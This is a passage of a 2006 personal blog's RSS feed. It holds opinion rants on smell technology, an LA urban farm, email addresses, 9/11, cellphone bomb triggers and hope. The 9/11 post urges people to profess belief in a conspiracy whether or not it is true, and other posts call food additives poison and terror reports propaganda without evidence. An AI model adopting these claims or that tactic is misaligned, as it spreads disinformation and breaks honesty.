			<content:encoded><![CDATA[<p>It&#8217;s amusing to see how &#8216;new&#8217;, almost magical technologies get embraced with so-much naivety. <a href="http://science.slashdot.org/science/06/07/03/0121252.shtml">Slashdot has this little blurb</a> about an article in the New Scientist on &#8216;smell-technology&#8217;;</p>
<blockquote><p>&#8220;Simply point the gadget at a freshly baked cookie, for example, and it will analyse its odour and reproduce it for you using a host of non-toxic chemicals. The device could be used to improve online shopping by allowing you to sniff foods or fragrances before you buy, to add an extra dimension to virtual reality environments and even to assist military doctors treating soldiers remotely by recreating bile, blood or urine odours that might help a diagnosis.&#8221;</p></blockquote>
<p>Yeh yeh &#8212; the usual &#8216;wet-dream&#8217; stories pop up &#8212; just like they do when they&#8217;re discussing anything <em>data-retention</em> or <em>RFID</em>.</p>
<p>Nah &#8212; it really is inconceivable that this isn&#8217;t going to be used to repress people. (That&#8217;s sarcasm.)  I don&#8217;t see Smell-O-Vision becoming a standard &#8212; I rather see sniffer-dogs loosing their jobs as they&#8217;re replaced with mechanics, keeping the costs of operating an air-port and stuff even lower&#8230;</p>
<p>I smell a new world odor&#8230;</p>
<p><tags>Progress, Inventions, Smell, Rant</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/07/03/on-smell-technology/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>On the LA urban farm and the future of self-grown crops</title>
		<link>http://navahogunleg.net/blog/2006/06/21/on-the-la-urban-farm-and-the-future-of-self-grown-crops/</link>
		<comments>http://navahogunleg.net/blog/2006/06/21/on-the-la-urban-farm-and-the-future-of-self-grown-crops/#comments</comments>
		<pubDate>Wed, 21 Jun 2006 08:53:33 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Animals & Nature]]></category>
		<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/06/21/on-the-la-urban-farm-and-the-future-of-self-grown-crops/</guid>
		<description><![CDATA[That LA urban farm business, after reading Chomsky, shows some parallels with US foreign policy: as a government, you cannot have a successful self-sustaining model where people make ends meet and actually are living happy because that happiness and peace is viral, and it may spread to other places, so the government looses its political [...]]]></description>
			<content:encoded><![CDATA[<p>That <a href="http://www.indymedia.org/en/2006/06/840859.shtml">LA urban farm business</a>, after reading Chomsky, shows some parallels with US foreign policy: as a government, you cannot have a successful self-sustaining model where people make ends meet and actually are living happy because that happiness and peace is viral, and it may spread to other places, so the government looses its political and commercial control over the area. It seems that this applies internally as well. I, and many others with me, think it&#8217;s insane that, after volunteers raised the necessary money, the bid to buy the land was just rejected.</p>
<p>Why the hell would you destroy nature and put up some warehouse? </p>
<p>Is this some global trend arising, preventing people from growing their own foods? I fear so.</p>
<p>Hell, there&#8217;s a &#8216;hose-pipe ban&#8217; in the UK (yeh, you <em>still</em> may clean your car with the same hose, though). </p>
<p>I wouldn&#8217;t be surprised that, in a couple of years, when genetically modified crops are &#8216;standard&#8217; (let&#8217;s try to prevent that in the first place OK), in order to &#8216;protect&#8217; the technology, will have insane licensing restrictions on them that will make it illegal to make your own derivate, or plant its seeds. (I wouldn&#8217;t even be surprised if these future crops will all come out <em>sinsemilla</em>, i.e. without seeds at all.) </p>
<p>I can see this move people getting prevented from growing our own food.  We can&#8217;t have physically and mentally healthy citizens, now can we? </p>
<p>We rather poison the masses by labeling industrial chemical byproducts as &#8216;food additive&#8217;, &#8216;sweetener&#8217; or toothpaste ingredient, because, like consultancy, there&#8217;s &#8216;<a href="http://www.despair.com/consulting.html">more money to be made in prolonging a problem</a>&#8216; than actually solving it.</p>
<p><tags>Freedom, Crops, Food, Farms</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/06/21/on-the-la-urban-farm-and-the-future-of-self-grown-crops/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sure, telephone numbers, etcetera, will all be replaced by a single email-address</title>
		<link>http://navahogunleg.net/blog/2006/06/14/sure-telephone-numbers-etcetera-will-all-be-replaced-by-a-single-email-address/</link>
		<comments>http://navahogunleg.net/blog/2006/06/14/sure-telephone-numbers-etcetera-will-all-be-replaced-by-a-single-email-address/#comments</comments>
		<pubDate>Wed, 14 Jun 2006 08:58:13 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Computers & Hardware]]></category>
		<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Internet & Technology]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[The Netherlands]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/06/14/sure-telephone-numbers-etcetera-will-all-be-replaced-by-a-single-email-address/</guid>
		<description><![CDATA[Some Dutch researcher suggests that, in the long run, (mobile) telephone numbers will disappear and will be replaced by one email-address. Although we can put people on the moon and make money of prolonging the problems of sickness, the spam problem most probably still won&#8217;t be solved. Not even touching the privacy-related issues there arise [...]]]></description>
			<content:encoded><![CDATA[<p>Some Dutch researcher <a href="http://www.nu.nl/news/754193/50/rss/E-mailadres_vervangt_telefoonnummer.html">suggests</a> that, in the long run, (mobile) telephone numbers will disappear and will be replaced by <strong><em>one</em></strong> email-address.</p>
<p>Although we can put people on the moon and make money of prolonging the problems of sickness, the <em>spam</em> problem most probably <em>still</em> won&#8217;t be solved. Not even touching the privacy-related issues there arise if you can only have a presence on the Internet by that single email-address. Sure it would be great for Big Brother, and for all these companies that will implement and profit from these technologies. I sincerely doubt consumers opting for this, voluntarily.</p>
<p>I wonder what that guy has been smoking because I want some of that too.</p>
<p><tags>Communication, Email, Future</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/06/14/sure-telephone-numbers-etcetera-will-all-be-replaced-by-a-single-email-address/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>On 9/11 conspiracies&#8230;</title>
		<link>http://navahogunleg.net/blog/2006/06/09/on-911-conspiracies/</link>
		<comments>http://navahogunleg.net/blog/2006/06/09/on-911-conspiracies/#comments</comments>
		<pubDate>Fri, 09 Jun 2006 10:25:43 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Conspiracies]]></category>
		<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/06/09/on-911-conspiracies/</guid>
		<description><![CDATA[You know: it doesn&#8217;t really matter if these stories are true or not (i.e. the theory that another group is responsible for the 9/11 attacks, somehow infiltrated the government, etcetera). It really doesn&#8217;t matter if it&#8217;s true. If it can take down the Bush administration, all the better. See, that&#8216;s the fun thing about politics: [...]]]></description>
			<content:encoded><![CDATA[<p>You know: it doesn&#8217;t really <em>matter</em> if these stories are true or not (i.e. the theory that another group is responsible for the 9/11 attacks, somehow infiltrated the government, etcetera).</p>
<p>It really doesn&#8217;t matter if it&#8217;s true. If it can take down the Bush administration, all the better.</p>
<p>See, <em>that</em>&#8216;s the fun thing about politics: &#8216;facts&#8217; don&#8217;t have to be <em>true</em> to make the public <em>believe</em> something needs to be done about something. </p>
<p>Even if you <em>don&#8217;t</em> believe them to be responsible &#8212; if you&#8217;d want the Bush administration &#8216;terminated&#8217; &#8212; just <em>say</em> you believe there&#8217;s big conspiracy behind this. The more people will say it, the more people will believe.</p>
<p>That&#8217;s exactly how <em>they</em> stole / are stealing <em>our</em> liberties&#8230;</p>
<p><tags>Politics, Lies, Truth, Propaganda, Conspiracies</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/06/09/on-911-conspiracies/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Freaks of Nature (or: why cellphone-based triggering devices are only used in the movies)</title>
		<link>http://navahogunleg.net/blog/2006/06/06/freaks-of-nature-or-why-cellphone-based-triggering-devices-are-only-used-in-the-movies/</link>
		<comments>http://navahogunleg.net/blog/2006/06/06/freaks-of-nature-or-why-cellphone-based-triggering-devices-are-only-used-in-the-movies/#comments</comments>
		<pubDate>Tue, 06 Jun 2006 07:35:07 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Conspiracies]]></category>
		<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[The Netherlands]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/06/06/freaks-of-nature-or-why-cellphone-based-triggering-devices-are-only-used-in-the-movies/</guid>
		<description><![CDATA[Freaks of Nature, and I&#8217;m not talking about a band name. I&#8217;m talking about what happened to me last week. You know, with the summer coming, we bought this handy wireless doorbell so that we can hear it ringing when we are, say, drinking with friends in the garden. Our &#8216;default&#8217; doorbell doesn&#8217;t ring that [...]]]></description>
			<content:encoded><![CDATA[<p>Freaks of Nature, and I&#8217;m not talking about a band name. I&#8217;m talking about what happened to me last week. </p>
<p>You know, with the summer coming, we bought this handy wireless doorbell so that we can hear it ringing when we are, say, drinking with friends in the garden. Our &#8216;default&#8217; doorbell doesn&#8217;t ring that loud, so this is a brilliant solution as you can simply take the ringing end with you anywhere you go.</p>
<p>There&#8217;s even this dip-switch thing on the button-part which enabled you to change the sound of the ring (yeah, weird that this is handled by the remote button, not the ringing-part).</p>
<p>Anyway, all fine and dandy. We have used it a couple of times and it really works out quite well.</p>
<p>Until last week, at about 7:30 in the morning. Being vast asleep me and the girlfriend were rudely awakened by a loud <em>Ding-dong</em>. </p>
<p>&#8220;<em>What the f&#8230;. &#8212; did someone ring the doorbell? At this hour?</em>&#8221;</p>
<p>Thing is, we configured the doorbell to ring sound &#8216;A&#8217;, but we heard sound &#8216;B&#8217;. I can&#8217;t think of anything else than that this must&#8217;ve been triggered by some &#8216;random&#8217; stream of bits in the ether that the receiver could detect. Coincidentally, it matched, and it rang its sound. See, if any neighbour would&#8217;ve bought the same device, we must&#8217;ve noticed that the recent days. If it only bought it the day before, we&#8217;d surely would&#8217;ve noticed it while he tested it, for instance. </p>
<p>But <em>no</em>, this was one stray signal that caused the device to ring.</p>
<p>Yeah that&#8217;s the problem with these devices &#8212; chances <em>are</em> that it receives the necessary information <em>purely coincidental</em>. </p>
<p>So, while not giving this any more mind, later that week, another group of terrorists was captured in London &#8212; the news footage showed something that supposed to be some home-brew explosive device: <em>triggered by a mobile phone</em>.</p>
<p>Now either <em>a)</em> the &#8216;terrorists&#8217; are really that stupid, or <em>b)</em> the media assumes us to be that naive to believe it. </p>
<p>Do you know what kind of risk one takes using a <em>cellphone</em> to trigger a detonation? </p>
<p>Haven&#8217;t you ever been called by some <em>telemarketeer</em> or just some idiot dialing the wrong number? </p>
<p>Didn&#8217;t you know that Big Brother knows exactly who called who, from where? </p>
<p>So if they bought a new mobile: <em>they are traceable</em> and thus can the culprits be punished.</p>
<p>If they stole a mobile for this task: <em>increased chances that someone dials that number</em>, accidentally setting of the charges.</p>
<p>I don&#8217;t mind being lead to believe that people are willing to blow themselves up <em>for</em> a cause &#8212; but <em>on their way to it</em>? </p>
<p>What the fuck do you need cellphone triggered devices for if we&#8217;re supposed to believe every terrorist wants to be a martyr and is willing to give their own life?</p>
<p><em>Nah, cellphone-based triggering devices are only used in the movies and in bad government propaganda.</em></p>
<p><tags>Freaks of Nature, Radiowaves, Terrorism, Propaganda, Observations</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/06/06/freaks-of-nature-or-why-cellphone-based-triggering-devices-are-only-used-in-the-movies/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The viral danger of &#8216;hope&#8217;..</title>
		<link>http://navahogunleg.net/blog/2006/06/01/the-viral-danger-of-hope/</link>
		<comments>http://navahogunleg.net/blog/2006/06/01/the-viral-danger-of-hope/#comments</comments>
		<pubDate>Thu, 01 Jun 2006 08:11:40 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/06/01/the-viral-danger-of-hope/</guid>
		<description><![CDATA[Hope is a very interesting concept. (And I am not talking about Hackers On Planet Earth) It is a feeling, or concept that we can find in various religions. In fact, you don&#8217;t even have to be religious to have ever had feelings of &#8216;hope&#8217;. But what is hope anyway? Is it really what it&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Hope is a very interesting concept. (And I am not talking about <a href="http://en.wikipedia.org/wiki/H.O.P.E.">Hackers On Planet Earth</a>) </p>
<p>It is a feeling, or concept that we can find in various religions. In fact, you don&#8217;t even have to be <em>religious</em> to have ever had feelings of &#8216;hope&#8217;.</p>
<p>But what <em>is</em> hope anyway? Is it really what it&#8217;s cranked up to be? Is this a human-only thing or do animals &#8216;enjoy&#8217; a similar concept? Do humans actually have any (positive) advantage over other species because of this concept? </p>
<p><em>I beg to differ.</em></p>
<p>To illustrate this, let me first start by explaining when, and why, &#8216;hope&#8217; takes effect. </p>
<p><span id="more-473"></span>Imagine a situation, say, a small prehistoric village with a few families living in it; including <em>you</em>. </p>
<p>Imagine a major drought. Imagine people starving and dying all around you. You could panic and take appropriate action, like trying to find food elsewhere, but your lack of energy (starvation remember) makes this impossible because moving around hurts like hell.</p>
<p>You could give up and kill yourself to avoid pain; but one could also &#8216;hope&#8217; that one day, the rain will come, and all will be same as old.</p>
<p>So what does &#8216;hope&#8217; then basically do? Psychologically, it makes you ignore the current situation you&#8217;re in (or don&#8217;t be bothered as much by it), in the belief that one time, no matter how far this is in the future, better times will come.</p>
<p>You could say that, in a way, &#8216;hope&#8217; is a &#8216;<em>survival mechanism</em>&#8216;: it will keep you in acceptance of the current situation you are in (or at least not be bothered as much), with the silly idea that one time, things will get better and all problems get solved.</p>
<p>And that&#8217;s exactly where the <em>danger</em> of this concept comes rearing it&#8217;s ugly head. </p>
<p>People have existed and roamed this planet for centuries now. Initially, we were <em>truly</em> free: no religion telling us what to do, no dictator forcing a way of life and lots of space. </p>
<p>The ancient philosophers already noticed the detoriation of society and it getting worse and worse. And what have we done the last 2000 years? Yeah, we <em>hoped</em> that things would get better. But has anything really changed for the better? </p>
<p>Nope, we only got greedier.</p>
<p>Although, yeah, we really <em>hope</em> that, one day, people all live happily together, there are no more wars, there is enough food and slavery has been completely abolished.</p>
<p>Yeah, but meanwhile, this <em>hope</em> really just keeps us subdued. Like the passed 2000 years &#8212; see where all that <em>hope</em> brought us.</p>
<p>And now people <em>hope</em> that one day, the truth on 9/11 will come out. They <em>hope</em> the Bush family bankrupts. They <em>hope</em> that once, the whole truth about the US&#8217;s war-mongering business (WW2, Vietnam, Iran/Iraq, the Taliban, Iraq) will once come out and the people responsible, somehow, punished.</p>
<p>The <em>hope</em> of a better world keeps us from taking <em>action</em> &#8212; and that&#8217;s exactly where the danger lies. Other people get affected by it and also start hoping, because they don&#8217;t like being &#8216;upset&#8217; all day and rather &#8216;have peace&#8217;. <em>Hope</em> seems to supply this peace and spreads an infects like a disease.</p>
<p>We see the environment getting messed up, but some president says &#8216;<em>The future technology will solve these problems.</em>&#8216;. That&#8217;s using &#8216;hope&#8217; as a basis <em>not to take action</em>. </p>
<p>Conclusion<br />
It&#8217;s the peoples&#8217; false optimism that makes this world get more paradoxal and insane as time goes by. </p>
<p>There&#8217;s <em>activism</em>, and there&#8217;s <em>hope that things will change</em>. </p>
<p>In my humble opinion two opposites and, <em>no action</em> seems for <em>selfish pussies</em>.</p>
<p><tags>Hope, Danger, Submission, Activism</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/06/01/the-viral-danger-of-hope/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

